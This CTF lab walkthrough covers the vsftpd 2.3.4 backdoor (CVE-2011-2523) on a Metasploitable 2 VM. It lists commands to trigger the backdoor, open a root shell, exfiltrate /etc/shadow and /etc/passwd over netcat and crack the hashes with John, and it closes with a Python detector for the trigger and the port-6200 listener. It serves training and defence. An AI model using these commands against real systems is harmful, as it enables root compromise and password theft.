
CVE-2011-2523 PoC — vsftpd OS command injection vulnerability

Associated Vulnerability
Title: vsftpd OS command injection vulnerability (CVE-2011-2523)
Description: vsftpd 2.3.4 downloaded between 20110630 and 20110703 contains a backdoor which opens a shell on port 6200/tcp.
Readme
# Scenario: Capture the Flag - CVE-2011-2523
Capture the `/etc/shadow` and `/etc/passwd` files from the vulnerable Metasploitable 2 server and recover the passwords from the shadow hashes.
# Setup Environment
## Step 1: Download and unzip the virtual machines
For this CTF, we run VMware Workstation Pro with two virtual machines: Kali Linux as the attacker's machine and Metasploitable 2 as the vulnerable machine.
- Download and install VMware Workstation: https://www.vmware.com/products/workstation-player/workstation-player-evaluation.html
- Download and extract the Kali Linux virtual machine: https://www.kali.org/get-kali/
- Download and extract the Metasploitable 2 virtual machine: https://sourceforge.net/projects/metasploitable/files/Metasploitable2/
## Step 2: Open the Kali Linux and Metasploitable 2 virtual machines in VMware from the extracted files
- Choose the `Open a Virtual Machine` option in VMware Workstation and select the unzipped Kali Linux file
- Right-click in the sidebar, select `Open`, then select the unzipped Metasploitable 2 file
- Press the `Play virtual machine` button on both virtual machines
- When prompted to choose between `I Moved It` and `I Copied It`, select `I Copied It`
## Step 3: Login
- Log in to Kali Linux using `kali` as both the username and password
- Log in to Metasploitable 2 using `msfadmin` as both the username and password
## Step 4: Record the IP address of the Metasploitable virtual machine
- Run `ip addr show` on Metasploitable and record the IP address shown in the `inet` field

# Solution
Massachusetts Institute of Technology Research and Engineering details CVE-2011-2523 as a common vulnerability and exposure where "vsftpd 2.3.4 downloaded between 20110630 and 20110703 contains a backdoor which opens a shell on port 6200/tcp".
## Step 1: Scan the Metasploitable machine for open ports and find the FTP service
- `nmap <vulnerable-machine-ip-address>`
- The nmap scan should show port 21 open, running the ftp service
## Step 2: Connect to the open port with netcat
- `nc <vulnerable-machine-ip-address> 21`
- The username can be any string ending in `:)`; enter `user <string>:)`
- When prompted for a password, enter any string: `pass <string>`
- Then close the connection with CTRL + C; the backdoor has now opened a root shell on port 6200 of the Metasploitable machine.
## Step 3: Connect to the shell on port 6200 of the vulnerable machine
- `nc -v <vulnerable-machine-ip-address> 6200`
- Show the IP address of the current connection with `ip addr show`
- Confirm that root access was granted with `whoami`
## Step 4: Copy the `/etc/shadow` and `/etc/passwd` files into other files
- `cp /etc/shadow shadow.txt`
- `cp /etc/passwd passwd.txt`
## Step 5: Send the copied files to the Kali Linux machine using netcat
- On the attacker machine, look up its IP address under `inet` using `ip addr show`
- Listen for the file with `nc -l -p 1234 > shadow.txt` on the attacker machine
- In the root shell on Metasploitable, send it with `nc -w 3 <destination-ip> 1234 < shadow.txt`
- Repeat for the passwd file
## Step 6: Format the shadow file into `John` input format
- `unshadow passwd.txt shadow.txt > unshadowed-input`
- Inspect the file with `cat unshadowed-input`; it should contain each username together with its password hash
## Step 7: Crack the shadow hashes using `John` and a wordlist
- Use the `rockyou.txt` wordlist to crack the hashes with john
- Unzip the wordlist file on Kali Linux using `sudo gzip -d /usr/share/wordlists/rockyou.txt.gz`
- When prompted for a password, use the default Kali Linux password `kali`
- Crack the hashes with `john unshadowed-input --wordlist=/usr/share/wordlists/rockyou.txt`
- View the cracked passwords with `john --show unshadowed-input`
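A defender-side check for the trigger used in Step 2 and the listener from Step 3, added here as an example and not part of the original README: it scans vsftpd-style log lines for a `USER` argument carrying the `:)` sequence and flags a listener on tcp/6200 in `ss -ltn` output. The log and `ss` lines are constructed for this example, and the check matches `:)` anywhere in the username, which covers the end-of-string form used in the walkthrough.

```python
"""Detect CVE-2011-2523 backdoor activation from vsftpd logs and socket state."""
import re

# Byte sequence that triggers the backdoor in the trojaned vsftpd 2.3.4 build.
TRIGGER = ":)"
BACKDOOR_PORT = 6200

# Constructed sample lines in vsftpd's log style (log_ftp_protocol=YES);
# the hosts, pids and names are made up for this example.
SAMPLE_LOG = """\
Mon Jul  4 10:02:14 2011 [pid 2102] FTP command: Client "10.0.0.5", "USER alice"
Mon Jul  4 10:02:16 2011 [pid 2102] [alice] OK LOGIN: Client "10.0.0.5"
Mon Jul  4 10:05:42 2011 [pid 2109] FTP command: Client "10.0.0.9", "USER letmein:)"
Mon Jul  4 10:05:44 2011 [pid 2109] FTP command: Client "10.0.0.9", "PASS <password>"
Mon Jul  4 10:07:01 2011 [pid 2115] FTP command: Client "10.0.0.7", "USER bob"
"""

# Constructed `ss -ltn` output showing the backdoor listener beside ftp and ssh.
SAMPLE_SS = """\
State   Recv-Q  Send-Q  Local Address:Port  Peer Address:Port
LISTEN  0       128     0.0.0.0:21          0.0.0.0:*
LISTEN  0       128     0.0.0.0:22          0.0.0.0:*
LISTEN  0       1       0.0.0.0:6200        0.0.0.0:*
"""

USER_CMD = re.compile(r'Client "(?P<client>[^"]+)", "USER (?P<user>[^"]*)"')
LISTEN_LINE = re.compile(r'^LISTEN\s+\d+\s+\d+\s+\S+:(?P<port>\d+)\s', re.M)

def find_trigger_attempts(log_text: str) -> list:
    """Return (client, username) for every USER command carrying the trigger.

    The trojaned build matched the two bytes anywhere in the USER argument,
    so this is a 'contains' check rather than an 'ends with' check."""
    hits = []
    for m in USER_CMD.finditer(log_text):
        if TRIGGER in m.group("user"):
            hits.append((m.group("client"), m.group("user")))
    return hits

def backdoor_listener_present(ss_output: str) -> bool:
    """True if any socket in `ss -ltn` output is listening on the backdoor port."""
    ports = {int(m.group("port")) for m in LISTEN_LINE.finditer(ss_output)}
    return BACKDOOR_PORT in ports

if __name__ == "__main__":
    for client, user in find_trigger_attempts(SAMPLE_LOG):
        print(f"backdoor trigger from {client}: USER {user!r}")
    if backdoor_listener_present(SAMPLE_SS):
        print(f"listener on tcp/{BACKDOOR_PORT}: treat the host as compromised")
```

On a real host, feed it `/var/log/vsftpd.log` and the live output of `ss -ltn`; a hit on either check is a strong indicator the backdoored build is installed or has already been triggered.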